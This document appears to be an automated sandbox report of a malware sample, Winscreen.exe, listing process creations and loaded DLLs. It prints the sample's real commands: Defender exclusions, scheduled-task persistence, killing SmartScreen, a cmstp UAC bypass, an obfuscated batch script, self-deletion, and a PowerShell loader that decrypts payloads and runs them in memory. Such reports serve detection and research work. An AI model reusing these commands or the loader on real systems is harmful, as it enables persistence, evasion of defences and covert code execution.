                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\izjuqhimv.vbs"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c @echo off Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe "C:\Users\user\AppData\Roaming\taskmoder.exe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\System32\userinit.exe"
                        Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Windows\explorer.exe C:\Windows\Explorer.EXE
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\winsin.bat"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "upx" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\upx.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\upx.exe "C:\Users\user\AppData\Roaming\upx.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "taskmoder" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\taskmoder.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe "C:\Users\user\AppData\Roaming\taskmoder.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Local\Temp\taskmen.exe "C:\Users\user\AppData\Local\Temp\taskmen.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.infJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\ydztkyrb.exe C:\Windows\temp\ydztkyrb.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\swtpd1aw.exe C:\Windows\temp\swtpd1aw.exe
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskmoder.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\izjuqhimv.vbs"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c @echo off Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\winsin.bat"
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\Client.exe "C:\Windows\Client.exe"
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\System32\userinit.exe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Windows\explorer.exe C:\Windows\Explorer.EXE
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
